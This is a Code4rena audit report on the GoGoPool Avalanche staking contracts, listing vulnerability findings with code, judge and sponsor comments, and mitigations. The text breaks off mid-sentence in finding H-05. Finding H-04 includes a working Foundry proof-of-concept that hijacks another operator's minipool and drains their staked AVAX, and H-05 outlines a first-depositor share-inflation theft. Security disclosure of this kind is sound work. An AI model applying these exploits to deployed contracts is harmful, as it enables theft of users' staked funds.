GoGoPool contest
Findings & Analysis Report
Table of contents
- Summary
- Scope
- Severity Criteria
- [H-01] AVAX Assigned High Water is updated incorrectly
- [H-02] ProtocolDAO lacks a method to take out GGP
- [H-03] Node operator is getting slashed for full duration even though rewards are distributed based on a 14 day cycle
- [H-04] Hijacking of node operators minipool causes loss of staked funds
- [H-05] Inflation of ggAVAX share price by first depositor
- [H-06] MinipoolManager: node operator can avoid being slashed
- [M-01]
: It is safe to have thestartRewardsCycle
modifier - [M-02] Coding logic of the contract upgrading renders upgrading contracts impractical
- [M-03] NodeOp funds may be trapped by a invalid state transition
- [M-04]
will always return the first enabled multisig which increases the probability of stuck minipools - [M-05] Bypass
modifier - [M-06] Inflation rate can be reduced by half at most if it gets called every 1.99 interval
- [M-07] Rialto may not be able to cancel minipools created by contracts that cannot receive AVAX
- [M-08] Recreated pools receive a wrong AVAX amount due to miscalculated compounded liquid staker amount
- [M-09] State Transition: Minipools can be created using other operator’s AVAX deposit via recreateMinipool
- [M-10] Functions
doesn’t reset the value of theRewardsStartTime
for user when user’sminipoolcount
is zero - [M-11] MultisigManager may not be able to add a valid Multisig
- [M-12] Cancellation of minipool may skip
checking if it was cancelled before - [M-13] Slashing fails when node operator doesn’t have enough staked
- [M-14] Any duration can be passed by node operator
- [M-15] Wrong reward distribution between early and late depositors because of the late
call in the cycle,syncReward()
logic should be executed in each withdraw or deposits (without reverting) - [M-16]
doesn’t return correct value which can make other contracts fail while working with protocol - [M-17] NodeOp can get rewards even if there was an error in registering the node as a validator
- [M-18] Users may not be able to redeem their shares due to underflow
- [M-19] MinipoolManager:
function does not decreaseminipoolCount
leading to too high GGP rewards for staker - [M-20] TokenggAVAX: maxDeposit and maxMint return wrong value when contract is paused
- [M-21] Division by zero error can block
if all multisig wallet are disabled - [M-22] Inaccurate estimation of validation rewards from function
- [M-01]
Low Risk and Non-Critical Issues
- Summary
- L‑01 Inflation not locked for four years
- L‑02 Contract will stop functioning in the year 2106
- L‑03 Lower-level initializations should come first
- L‑04 Incorrect percentage conversion
- L‑05 Loss of precision
- L‑06 Signatures vulnerable to malleability attacks
- L‑07
should be used instead ofassert()
- N‑01 Common code should be refactored
- N‑02 String constants used in multiple places should be defined as constants
- N‑03 Constants in comparisons should appear on the left side
- N‑04 Inconsistent address separator in storage names
- N‑05 Confusing function name
- N‑06 Misplaced punctuation
- N‑07 Upgradeable contract is missing a
storage variable to allow for new storage variables in later versions - N‑08 Import declarations should import specific identifiers, rather than the whole file
- N‑09 Missing
modifier on constructor - N‑10 The
should occur before all other modifiers - N‑11
function arguments that are unused should have the variable name removed or commented out to avoid compiler warnings - N‑12
s should be defined rather than using magic numbers - N‑13 Missing event and or timelock for critical parameter change
- N‑14 Events that mark critical parameter changes should contain both the old and the new value
- N‑15 Use a more recent version of solidity
- N‑16 Use a more recent version of solidity
- N‑17 Constant redefined elsewhere
- N‑18 Lines are too long
- N‑19 Variable names that consist of all capital letters should be reserved for
variables - N‑20 Using
without specifying an upper bound is unsafe - N‑21 Typos
- N‑22 File is missing NatSpec
- N‑23 NatSpec is incomplete
- N‑24 Not using the named return variables anywhere in the function is confusing
- N‑25 Contracts should have full test coverage
- N‑26 Large or complicated code bases should implement fuzzing tests
- N‑27 Function ordering does not follow the Solidity style guide
- N‑28 Contract does not follow the Solidity style guide’s suggested layout ordering
- N‑29 Open TODOs
- Excluded findings
- Summary
- G‑01 State variables can be packed into fewer storage slots
- G‑02 Use a more recent version of solidity
- G‑03
should beunchecked{++i}
when it is not possible for them to overflow, as is the case when used infor
- andwhile
-loops - G‑04
functions only called once can be inlined to save gas - G‑05 Functions guaranteed to revert when called by normal users can be marked
- G‑06 Optimize names to save gas
- G‑07 Use custom errors rather than
strings to save gas - G‑08 Add
unchecked {}
for subtractions where the operands cannot underflow because of a previousrequire()
-statement - G‑09 Multiple accesses of a mapping/array should use a local variable cache
- G‑10 State variables should be cached in stack variables rather than re-reading them from storage
- G‑11 Modification of
increases gas savings in G‑10 - G‑12
<x> += <y>
costs more gas than<x> = <x> + <y>
for state variables (-=
too) - G‑13 Division by two should use bit shifting
- G‑14 The result of function calls should be cached rather than re-calling the function
- G‑15 Don’t compare boolean expressions to boolean literals
- G‑16 Splitting
statements that use&&
saves gas - G‑17 Stack variable used as a cheaper cache for a state variable is only used once
- Introduction
- Overview of Changes
- Mitigation Review Scope
- Mitigation Review Summary
- [MR:M-01] The node operators are likely to be slashed in an unfair way
- [MR:M-02] Deficiency of slashed GGP amount should be made up from node operator’s AVAX
- [MR:M-03]
not fully utilized withcompoundedAvaxNodeOpAmt
easily forfeited - [MR:M-04] There is no way to retrieve the rewards from the MultisigManager and rewards are locked in the vault
- Disclosures
About C4
Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.
A C4 audit contest is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.
During the audit contest outlined in this document, C4 conducted an analysis of the GoGoPool smart contract system written in Solidity. The audit contest took place between December 15—January 3 2023.
Following the C4 audit contest, 3 wardens (hansfriese, RaymondFam, and ladboy233) reviewed the mitigations for all identified issues; the mitigation review report is appended below the audit contest report.
114 Wardens contributed reports to the GoGoPool contest:
- 0Kage
- 0x73696d616f
- 0xLad
- 0xNazgul
- 0xSmartContract
- 0xbepresent
- 0xc0ffEE
- 0xdeadbeef0x
- 0xhunter
- 0xmint
- AkshaySrivastav
- Allarious
- Arbor-Finance (namaskar and bookland)
- Atarpara
- Aymen0909
- Bnke0x0
- Breeje
- Ch_301
- Czar102
- Deivitto
- Faith
- Franfran
- HE1M
- HollaDieWaldfee
- IllIllI
- Jeiwan
- Josiah
- KmanOfficial
- Lirios
- Manboy
- Matin
- NoamYakov
- Nyx
- PaludoX0
- Qeew
- RaymondFam
- Rolezn
- Saintcode_
- SamGMK
- SmartSek (0xDjango and hake)
- TomJ
- V_B (Barichek and vlad_bochok)
- WatchDogs
- __141345__
- adriro
- ak1
- ast3ros
- aviggiano
- betweenETHlines
- bin2chen
- brgltd
- btk
- c3phas
- camdengrieh
- caventa
- cccz
- chaduke
- ck
- clems4ever
- codeislight
- cozzetti
- cryptonue
- cryptostellar5
- csanuragjain
- danyams
- datapunk
- dic0de
- eierina
- enckrish
- fatherOfBlocks
- fs0c
- gz627
- hansfriese
- hihen
- imare
- immeas
- jadezti
- joestakey
- kaliberpoziomka8552
- kartkhira
- kiki_dev
- koxuan
- ladboy233
- latt1ce
- lukris02
- mert_eren
- minhtrng
- mookimgo
- nadin
- nameruse
- neumo
- nogo
- pauliax
- peakbolt
- peanuts
- peritoflores
- rvierdiiev
- sces60107
- shark
- simon135
- sk8erboy
- slowmoses
- stealthyz
- supernova
- tonisives
- unforgiven
- wagmi
- wallstreetvilkas
- yixxas
- yongskiws
This contest was judged by Alex the Entreprenerd.
Final report assembled by liveactionllama.
The C4 analysis yielded an aggregated total of 28 unique vulnerabilities. Of these vulnerabilities, 6 received a risk rating in the category of HIGH severity and 22 received a risk rating in the category of MEDIUM severity.
Additionally, C4 analysis included 15 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 12 reports recommending gas optimizations.
All of the issues presented here are linked back to their original finding.
The code under review can be found within the C4 GoGoPool contest repository, and is composed of 18 smart contracts written in the Solidity programming language and includes 2,040 lines of Solidity code.
Severity Criteria
C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.
High-level considerations for vulnerabilities span the following key areas when conducting assessments:
- Malicious Input Handling
- Escalation of privileges
- Arithmetic
- Gas use
For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.
High Risk Findings (6)
[H-01] AVAX Assigned High Water is updated incorrectly
Submitted by hansfriese, also found by unforgiven, wagmi, betweenETHlines, Allarious, HollaDieWaldfee, and chaduke
Node operators can manipulate the assigned high water to be higher than the actual.
Proof of Concept
The protocol rewards node operators according to the AVAXAssignedHighWater
that is the maximum amount assigned to the specific staker during the reward cycle.
In the function MinipoolManager.recordStakingStart()
, the AVAXAssignedHighWater
is updated as below.
349: function recordStakingStart(
350: address nodeID,
351: bytes32 txID,
352: uint256 startTime
353: ) external {
354: int256 minipoolIndex = onlyValidMultisig(nodeID);
355: requireValidStateTransition(minipoolIndex, MinipoolStatus.Staking);
356: if (startTime > block.timestamp) {
357: revert InvalidStartTime();
358: }
360: setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Staking));
361: setBytes32(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".txID")), txID);
362: setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".startTime")), startTime);
364: // If this is the first of many cycles, set the initialStartTime
365: uint256 initialStartTime = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".initialStartTime")));
366: if (initialStartTime == 0) {
367: setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".initialStartTime")), startTime);
368: }
370: address owner = getAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".owner")));
371: uint256 avaxLiquidStakerAmt = getUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".avaxLiquidStakerAmt")));
372: Staking staking = Staking(getContractAddress("Staking"));
373: if (staking.getAVAXAssignedHighWater(owner) < staking.getAVAXAssigned(owner)) {
374: staking.increaseAVAXAssignedHighWater(owner, avaxLiquidStakerAmt);//@audit wrong
375: }
377: emit MinipoolStatusChanged(nodeID, MinipoolStatus.Staking);
378: }
In the line #373, if the current assigned AVAX is greater than the owner’s AVAXAssignedHighWater
, it is increased by avaxLiquidStakerAmt
But this is supposed to be updated to staking.getAVAXAssigned(owner)
rather than being increased by the amount.
The node operator creates a minipool with 1000AVAX via createMinipool(nodeID, 2 weeks, delegationFee, 1000*1e18)
On creation, the assigned AVAX for the operator will be 1000AVAX.
If the Rialtor calls recordStakingStart()
, AVAXAssignedHighWater
will be updated to 1000AVAX.
After the validation finishes, the operator creates another minipool with 1500AVAX this time. Then on recordStakingStart()
, AVAXAssignedHighWater
will be updated to 2500AVAX by increasing 1500AVAX because the current assigned AVAX is 1500AVAX which is higher than the current AVAXAssignedHighWater=1000AVAX
This is wrong because the actual highest assigned amount is 1500AVAX.
Note that AVAXAssignedHighWater
is reset only through the function calculateAndDistributeRewards
which can be called after RewardsCycleSeconds=28 days
Recommended Mitigation Steps
Call staking.resetAVAXAssignedHighWater(owner)
instead of calling increaseAVAXAssignedHighWater()
373: if (staking.getAVAXAssignedHighWater(owner) < staking.getAVAXAssigned(owner)) {
374: staking.resetAVAXAssignedHighWater(owner); //@audit update to the current AVAX assigned
375: }
emersoncloud (GoGoPool) confirmed
Can we take some extra considerations here please?
Discussed with @0xju1ie (GoGoPool) about this specific issue, and this was the answer:(it is AVAXAssignedHighWater)
It increases on a per minipool basis right now, increasing based on only what that single minipool is getting. If it was to just update the AVAXAssignedHighWater to getAVAXAssigned, then it could be assigning the highwater mark too early. EX for how it is now: 1. create minipool1, assignedAvax = 1k, high water= 0 2. create minipool2, assignedAvax =1k, high water = 0 3. record start for minipool1, highwater -> 1k 4. record start for minipool2, highwater -> 2k EX for how your suggestion could be exploited: 1. create minipool1, assignedAvax = 1k, high water= 0 2. create minipool2, assignedAvax =1k, high water = 0 3. record start for minipool1, highwater -> 2k 4. cancel minipool2, highwater -> 2k if we used only avax assigned for that case then it would mess up the collateralization ratio for the second minipool and they would only get paid for the minipool that they are currently operating, not the one that ended previously.
Their example in the proof of concept section is correct, and we have decided that this is not the ideal behavior and thus this is a bug. However, their recommended mitigation steps would create other issues, as highlighted by what @Franfran said. We intend to solve this issue differently than what they suggested.
Alex the Entreprenerd (judge) commented:
The Warden has shown a flaw in the way
is used, which can be used to:
- Inflate the amount of AVAX
- With the goal of extracting more rewards than intended
I believe that the finding highlights both a way to extract further rewards as well as broken accounting.
For this reason I agree with High Severity.
emersoncloud (GoGoPool) mitigated:
New variable to track validating avax: multisig-labs/gogopool#25
Status: Mitigation confirmed with comments. Full details in report from RaymondFam.
[H-02] ProtocolDAO lacks a method to take out GGP
Submitted by bin2chen, also found by AkshaySrivastav, hansfriese, hansfriese, caventa, shark, RaymondFam, csanuragjain, rvierdiiev, and cozzetti
ProtocolDAO implementation does not have a method to take out GGP. So it can’t handle ggp unless it updates ProtocolDAO.
Proof of Concept
recordStakingEnd() will pass the rewards of this reward.
“If the validator is failing at their duties, their GGP will be slashed and used to compensate the loss to our Liquid Stakers”
At this point slashGGP() will be executed and the GGP will be transferred to “ProtocolDAO”
function slashGGP(address stakerAddr, uint256 ggpAmt) public onlySpecificRegisteredContract("MinipoolManager", msg.sender) {
Vault vault = Vault(getContractAddress("Vault"));
decreaseGGPStake(stakerAddr, ggpAmt);
vault.transferToken("ProtocolDAO", ggp, ggpAmt);
But the current ProtocolDAO implementation does not have a method to take out GGP. So it can’t handle ggp unless it updates ProtocolDAO
Recommended Mitigation Steps
1.transfer GGP to ClaimProtocolDAO
2.Similar to ClaimProtocolDAO, add spend method to retrieve GGP
contract ProtocolDAO is Base {
+ function spend(
+ address recipientAddress,
+ uint256 amount
+ ) external onlyGuardian {
+ Vault vault = Vault(getContractAddress("Vault"));
+ TokenGGP ggpToken = TokenGGP(getContractAddress("TokenGGP"));
+ if (amount == 0 || amount > vault.balanceOfToken("ProtocolDAO", ggpToken)) {
+ revert InvalidAmount();
+ }
+ vault.withdrawToken(recipientAddress, ggpToken, amount);
+ emit GGPTokensSentByDAOProtocol(address(this), recipientAddress, amount);
+ }
Alex the Entreprenerd (judge) increased severity to High and commented:
The Warden has shown how, due to a lack of
the default contract for fee handling will be unable to retrieve tokens sent to it.While the issue definitely would have been discovered fairly early in Prod, the in-scope system makes it clear that the funds would have been sent to ProtocolDAO.sol and would have been lost indefinitely.
For this reason, I believe the finding to be of High Severity.
emersoncloud (GoGoPool) commented:
Thanks for the report. This is something we’re aware of and are not going to fix at the moment.
The funds are transferred to the Vault and the ProtocolDAO contract is upgradeable. Therefore in the future we can upgrade the contract to spend the Vault GGP tokens to return funds to Liquid Stakers.
We expect slashing to be a rare event and might have some manual steps involved in the early days of the protocol to do this process if it occurs.
[H-03] Node operator is getting slashed for full duration even though rewards are distributed based on a 14 day cycle
Submitted by immeas, also found by Allarious, ast3ros, unforgiven, Josiah, SmartSek, Franfran, HollaDieWaldfee, RaymondFam, and 0xdeadbeef0x
A node operator sends in the amount of duration they want to stake for. Behind the scenes Rialto will stake in 14 day cycles and then distribute rewards.
If a node operator doesn’t have high enough availability and doesn’t get any rewards, the protocol will slash their staked GGP
. For calculating the expected rewards that are missed however, the full duration is used:
File: MinipoolManager.sol
557: function getExpectedAVAXRewardsAmt(uint256 duration, uint256 avaxAmt) public view returns (uint256) {
558: ProtocolDAO dao = ProtocolDAO(getContractAddress("ProtocolDAO"));
559: uint256 rate = dao.getExpectedAVAXRewardsRate();
560: return (avaxAmt.mulWadDown(rate) * duration) / 365 days; // full duration used when calculating expected reward
561: }
670: function slash(int256 index) private {
673: uint256 duration = getUint(keccak256(abi.encodePacked("minipool.item", index, ".duration")));
674: uint256 avaxLiquidStakerAmt = getUint(keccak256(abi.encodePacked("minipool.item", index, ".avaxLiquidStakerAmt")));
675: uint256 expectedAVAXRewardsAmt = getExpectedAVAXRewardsAmt(duration, avaxLiquidStakerAmt); // full duration
676: uint256 slashGGPAmt = calculateGGPSlashAmt(expectedAVAXRewardsAmt);
This is unfair to the node operator because the expected rewards is from a 14 day cycle.
Also, If they were to be unavailable again, in a later cycle, they would get slashed for the full duration once again.
A node operator staking for a long time is getting slashed for an unfairly large amount if they aren’t available during a 14 day period.
The protocol also wants node operators to stake in longer periods: https://multisiglabs.notion.site/Known-Issues-42e2f733daf24893a93ad31100f4cd98
Team Comment:
- This can only be taken advantage of when signing up for 2-4 week validation periods. Our protocol is incentivizing nodes to sign up for 3-12 month validation periods. If the team notices this mechanic being abused, Rialto may update its GGP reward calculation to disincentive this behavior.
This slashing amount calculation incentives the node operator to sign up for the shortest period possible and restake themselves to minimize possible losses.
Proof of Concept
Test in MinipoolManager.t.sol
function testRecordStakingEndWithSlashHighDuration() public {
uint256 duration = 365 days;
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
uint256 validationAmt = depositAmt + avaxAssignmentRequest;
uint128 ggpStakeAmt = 200 ether;
ggp.approve(address(staking), MAX_AMT);
MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration);
address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
ggAVAX.depositAVAX{value: MAX_AMT}();
bytes32 txID = keccak256("txid");
minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);
skip(2 weeks); // a two week cycle
minipoolMgr.recordStakingEnd{value: validationAmt}(mp1.nodeID, block.timestamp, 0 ether);
assertEq(vault.balanceOf("MinipoolManager"), depositAmt);
int256 minipoolIndex = minipoolMgr.getIndexOf(mp1.nodeID);
MinipoolManager.Minipool memory mp1Updated = minipoolMgr.getMinipool(minipoolIndex);
assertEq(mp1Updated.status, uint256(MinipoolStatus.Withdrawable));
assertEq(mp1Updated.avaxTotalRewardAmt, 0);
assertTrue(mp1Updated.endTime != 0);
assertEq(mp1Updated.avaxNodeOpRewardAmt, 0);
assertEq(mp1Updated.avaxLiquidStakerRewardAmt, 0);
assertEq(minipoolMgr.getTotalAVAXLiquidStakerAmt(), 0);
assertEq(staking.getAVAXAssigned(mp1Updated.owner), 0);
assertEq(staking.getMinipoolCount(mp1Updated.owner), 0);
// log slash amount
Slashed amount for a 365 days
duration is 100 eth
(10%). However, where they to stake for the minimum time, 14 days
the slashed amount would be only ~3.8 eth
Tools Used
vs code, forge
Recommended Mitigation Steps
Either hard code the duration to 14 days for calculating expected rewards or calculate the actual duration using startTime
and endTime
Alex the Entreprenerd (judge) increased severity to High and commented:
The Warden has shown an incorrect formula that uses the
of the pool for slashing.The resulting loss can be up to 26 times the yield that should be made up for.
Because the:
- Math is incorrect
- Based on intended usage
- Impact is more than an order of magnitude off
- Principal is impacted (not just loss of yield)
I believe the most appropriate severity to be High.
emersoncloud (GoGoPool) mitigated:
Base slash on validation period not full duration: multisig-labs/gogopool#41
Status: Mitigation confirmed by RaymondFam and hansfriese.
[H-04] Hijacking of node operators minipool causes loss of staked funds
Submitted by 0xdeadbeef0x, also found by bin2chen, datapunk, 0xmint, Lirios, AkshaySrivastav, adriro, ak1, IllIllI, pauliax, imare, imare, immeas, sces60107, peritoflores, wagmi, Jeiwan, sk8erboy, unforgiven, caventa, yixxas, Franfran, clems4ever, Ch_301, Allarious, 0xc0ffEE, 0Kage, kaliberpoziomka8552, kaliberpoziomka8552, HollaDieWaldfee, wallstreetvilkas, stealthyz, cozzetti, rvierdiiev, ladboy233, chaduke, chaduke, and Manboy
A malicious actor can hijack a minipool of any node operator that finished the validation period or had an error.
The impacts:
- Node operators staked funds will be lost (Loss of funds)
- Hacker can hijack the minipool and retrieve rewards without hosting a node. (Theft of yield)
2.1 See scenario #2 comment for dependencies
Proof of Concept
Background description
The protocol created a state machine that validates transitions between minipool states. For this exploit it is important to understand three states:
- This state is the initial state when a minipool is created. The created minipool will have a status ofPrelaunch
until liquid stakers funds are matched andrialto
stakes 2000 AVAX into Avalanche.Withdrawable
- This state is set when the 14 days validation period is over. In this state:
returned 1000 AVAX to the liquid stakers and handled reward distribution.
2.2. Node operators can withdraw their staked funds and rewards.
2.3. If the node operator signed up for a duration longer than 14 daysrialto
will recreate the minipool and stake it for another 14 days.Error
- This state is set whenrialto
has an issue to stake the funds in Avalanche
The state machine allows transitions according the requireValidStateTransition
function requireValidStateTransition(int256 minipoolIndex, MinipoolStatus to) private view {
} else if (currentStatus == MinipoolStatus.Withdrawable || currentStatus == MinipoolStatus.Error) {
isValid = (to == MinipoolStatus.Finished || to == MinipoolStatus.Prelaunch);
} else if (currentStatus == MinipoolStatus.Finished || currentStatus == MinipoolStatus.Canceled) {
// Once a node is finished/canceled, if they re-validate they go back to beginning state
isValid = (to == MinipoolStatus.Prelaunch);
In the above restrictions, we can see that the following transitions are allowed:
- From
state toPrelaunch
state. This transition enablesrialto
to callrecreateMinipool
- From
state toPrelaunch
state. This transition allows a node operator to re-use their nodeID to stake again in the protocol. - From
state toPrelaunch
state. This transition allows a node operator to re-use their nodeID to stake again in the protocol after an error.
#2 is a needed capability, therefore createMinipool
allows overriding a minipool record if:
already exists and transition to Prelaunch
is permitted
function createMinipool(
address nodeID,
uint256 duration,
uint256 delegationFee,
uint256 avaxAssignmentRequest
) external payable whenNotPaused {
// Create or update a minipool record for nodeID
// If nodeID exists, only allow overwriting if node is finished or canceled
// (completed its validation period and all rewards paid and processing is complete)
int256 minipoolIndex = getIndexOf(nodeID);
if (minipoolIndex != -1) {
requireValidStateTransition(minipoolIndex, MinipoolStatus.Prelaunch);
setUint(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".status")), uint256(MinipoolStatus.Prelaunch));
setAddress(keccak256(abi.encodePacked("minipool.item", minipoolIndex, ".owner")), msg.sender);
THE BUG: createMinipool
can be called by Anyone with the nodeID
of any node operator.
If createMinipool
is called at the Withdrawable
state or Error
- The transaction will be allowed
- The owner of the minipool will be switched to the caller.
Therefore, the minipool is hijacked and the node operator will not be able to withdraw their funds.
Exploit scenarios
As shown above, an attacker can always hijack the minipool and lock the node operators funds.
- Cancel the minipool
- Earn rewards on behalf of original NodeOp
Scenario #1 - Cancel the minipool
A hacker can hijack the minipool and immediately cancel the pool after a 14 day period is finished or an error state. Results:
- Node operator will lose all his staked AVAX
1.1. This can be done by a malicious actor to ALL GoGoPool stakers to lose their funds in a period of 14 days. - Hacker will not lose anything and not gain anything.
Consider the following steps:
- Hacker creates a node and creates a minipool
. - NodeOp registers a nodeID
and finished the 14 days stake period. State isWithdrawable
. - Hacker calls
and deposits 1000 AVAX. Hacker is now owner of the minipool - Hacker calls
and receives his staked 1000 AVAX. - NodeOp cannot withdraw his staked AVAX as NodeOp is no longer the owner.
- Hacker can withdraw staked AVAX for both
The above step #1 is not necessary but allow the hacker to immediately cancel the minipool without waiting 5 days.
(See other submitted bug #211: “Anti griefing mechanism can be bypassed”)
┌───────────┐ ┌───────────┐ ┌───────────┐ ┌───────────┐
│ │ │ │ │ │ │ │
│ Rialto │ │ NodeOp │ │ Minipool │ │ Hacker │
│ │ │ │ │ Manager │ │ │
└─────┬─────┘ └─────┬─────┘ └─────┬─────┘ └─────┬─────┘
│claimAndInitiate(Node-1337)│ │createMinipool(Node-1337) │
│recordStakingStart(...) │ │◄─────────────────────────┤ ┌────────────┐
├───────────────────────────┼───────────────────────►│ │ │ 1000 AVAX │
│ │ │ │ │ 100 GPP │
│ │createMinipool(Node-123)│ │ └────────────┘
│claimAndInitiate(Node-123) ├───────────────────────►│ │
│recordStakingStart(...) │ │ │
├───────────────────────────┼───────────────────────►│ │
┌──────────┐ │ │ │ │
│14 days │ │recordStakingEnd(Node-1337)│ │ │
└──────────┘ │recordStakingEnd(Node-123) │//STATE: WITHDRAWABLE// │ │ ┌────────────┐
├───────────────────────────┼───────────────────────►│ │ │ 1000 AVAX │
│ │ │createMinipool(Node-123) │ │Hacker=Owner│
│ │ │◄─────────────────────────┤ └────────────┘
│ │withdrawMinipoolF..(123)│ │
│ ├───────────────────────►│cancleMinipool(Node-123) │
│ │ REVERT! │◄─────────────────────────┤
│ │◄───────────────────────┤ 1000 AVAX │
│ │ ├─────────────────────────►│
│ │ ┌────────────────┐ │withdrawMinipoolFunds(1337│ ┌──────────┐
│ │ │ NodeOp loses │ │◄─────────────────────────┤ │Withdraw │
│ │ │ his 1000 AVAX │ │ 1000 AVAX + REWARDS │ │stake and │
│ │ │ Stake, cannot │ ├─────────────────────────►│ │rewards │
│ │ │ withdraw │ │ │ └──────────┘
│ │ └────────────────┘ │ ┌───────────────┐ │
│ │ │ │Hacker loses no│ │
│ │ │ │funds, can │ │
│ │ │ │withdraw GPP │ │
│ │ │ └───────────────┘ │
Scenario #2 - Use node of node operator
In this scenario the NodeOp registers for a duration longer then 14 days. The hacker will hijack the minipool after 14 days and earn rewards on behalf of the node operators node for the rest of the duration.
As the NodeOp registers for a longer period of time, it is likely he will not notice he is not the owner of the minipool and continue to use his node to validate Avalanche.
- Node operator will lose all his staked AVAX
- Hacker will gain rewards for staking without hosting a node
Important to note:
- This scenario is only possible if
are not called in the same transaction byrialto
. - During the research the sponsor has elaborated that they plan to perform the calls in the same transaction.
- The sponsor requested to submit issues related to
single/multi transactions for information and clarity anyway.
Consider the following steps:
- Hacker creates a node and creates a minipool
. - NodeOp registers a nodeID
for 28 days duration and finished the 14 days stake period. State isWithdrawable
. - Hacker calls
and deposits 1000 AVAX. Hacker is now owner of minipool - Rialto calls
to restake the minipool in Avalanche. (This time: the owner is the hacker, the hardware is NodeOp) - 14 days have passed, hacker can withdraw the rewards and 1000 staked AVAX
- NodeOps cannot withdraw staked AVAX.
Foundry POC
The POC will demonstrate scenario #1.
Add the following test to MinipoolManager.t.sol
function testHijackMinipool() public {
uint256 duration = 2 weeks;
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
uint256 rewards = 10 ether;
uint256 expectedRewards = (rewards/2)+(rewards/2).mulWadDown(dao.getMinipoolNodeCommissionFeePct());
uint256 validationAmt = depositAmt + avaxAssignmentRequest;
uint128 ggpStakeAmt = 100 ether;
address hacker = address(0x1337);
// Fund hacker with exact AVAX and gpp
vm.deal(hacker, depositAmt*2);
dealGGP(hacker, ggpStakeAmt);
// Fund nodeOp with exact AVAX and gpp
nodeOp = address(0x123);
vm.deal(nodeOp, depositAmt);
dealGGP(nodeOp, ggpStakeAmt);
// fund ggAVAX
address lilly = getActorWithTokens("lilly", MAX_AMT, MAX_AMT);
ggAVAX.depositAVAX{value: MAX_AMT}();
assertEq(lilly.balance, 0);
// Hacker stakes GGP
ggp.approve(address(staking), ggpStakeAmt);
// Create minipool for hacker
MinipoolManager.Minipool memory hackerMp = createMinipool(depositAmt, avaxAssignmentRequest, duration);
// nodeOp stakes GGP
ggp.approve(address(staking), ggpStakeAmt);
// Create minipool for nodeOp
MinipoolManager.Minipool memory nodeOpMp = createMinipool(depositAmt, avaxAssignmentRequest, duration);
// Rialto stakes both hackers and nodeOp in avalanche
// Update that staking has started
bytes32 txID = keccak256("txid");
minipoolMgr.recordStakingStart(nodeOpMp.nodeID, txID, block.timestamp);
minipoolMgr.recordStakingStart(hackerMp.nodeID, txID, block.timestamp);
// Skip 14 days of staking duration
// Update that staking has ended and funds are withdrawable
minipoolMgr.recordStakingEnd{value: validationAmt + rewards}(nodeOpMp.nodeID, block.timestamp, 10 ether);
minipoolMgr.recordStakingEnd{value: validationAmt + rewards}(hackerMp.nodeID, block.timestamp, 10 ether);
// Hacker creates a minipool using nodeID of nodeOp
// Hacker is now the owner of nodeOp minipool
minipoolMgr.createMinipool{value: depositAmt}(nodeOpMp.nodeID, duration, 0.02 ether, avaxAssignmentRequest);
// Hacker immediatally cancels the nodeOp minipool, validate 1000 AVAX returned
assertEq(hacker.balance, depositAmt);
// Hacker withdraws his own minipool and receives 1000 AVAX + rewards
assertEq(hacker.balance, depositAmt + depositAmt + expectedRewards);
// Hacker withdraws his staked ggp
assertEq(ggp.balanceOf(hacker), ggpStakeAmt);
// NodeOp tries to withdraw his funds from the minipool
// Transaction reverts because NodeOp is not the owner anymore
// NodeOp can still release his staked gpp
assertEq(ggp.balanceOf(nodeOp), ggpStakeAmt);
To run the POC, execute:
forge test -m testHijackMinipool -v
Expected output:
Running 1 test for test/unit/MinipoolManager.t.sol:MinipoolManagerTest
[PASS] testHijackMinipool() (gas: 2346280)
Test result: ok. 1 passed; 0 failed; finished in 9.63s
Tools Used
VS Code, Foundry
Recommended Mitigation Steps
Fortunately, the fix is very simple.
The reason createMinipool
is called with an existing nodeID
is to re-use the nodeID
again with the protocol. GoGoPool can validate that the owner is the same address as the calling address. GoGoPool have already implemented a function that does this: onlyOwner(index)
Consider placing onlyOwner(index)
in the following area:
function createMinipool(
address nodeID,
uint256 duration,
uint256 delegationFee,
uint256 avaxAssignmentRequest
) external payable whenNotPaused {
int256 minipoolIndex = getIndexOf(nodeID);
if (minipoolIndex != -1) {
onlyOwner(minipoolIndex); // AUDIT: ADDED HERE
} else {
Alex the Entreprenerd (judge) commented:
The Warden has shown how, due to a lax check for State Transition, a Pool ID can be hijacked, causing the loss of the original deposit
Because the attack is contingent on a logic flaw and can cause a complete loss of Principal, I agree with High Severity.
Separate note: I created issue 904. For the Finding 2 of this report, please refrain from grouping findings especially when they use different functions and relate to different issues.
emersoncloud (GoGoPool) mitigated:
Atomically recreate minipool to not allow hijack: multisig-labs/gogopool#23
Status: Mitigation confirmed, but a new medium severity issue was found. Full details in report from hansfriese, and also included in Mitigation Review section below.
[H-05] Inflation of ggAVAX share price by first depositor
Submitted by 0xdeadbeef0x, also found by eierina, ak1, datapunk, 0xNazgul, Qeew, Breeje, SamGMK, IllIllI, TomJ, sces60107, WatchDogs, Arbor-Finance, SmartSek, hansfriese, tonisives, peanuts, unforgiven, 0xSmartContract, fs0c, ck, 0xbepresent, yongskiws, 0xLad, btk, rvierdiiev, koxuan, ladboy233, Rolezn, HE1M, yongskiws, SEVEN, and dic0de
Inflation of ggAVAX
share price can be done by depositing as soon as the vault is created.
- Early depositor will be able steal other depositors funds
- Exchange rate is inflated. As a result depositors are not able to deposit small funds.
Proof of Concept
is not seeded as soon as it is created, a malicious depositor can deposit 1 WEI of AVAX to receive 1 share.
The depositor can donate WAVAX to the vault and call syncRewards
. This will start inflating the price.
When the attacker front-runs the creation of the vault, the attacker:
- Calls
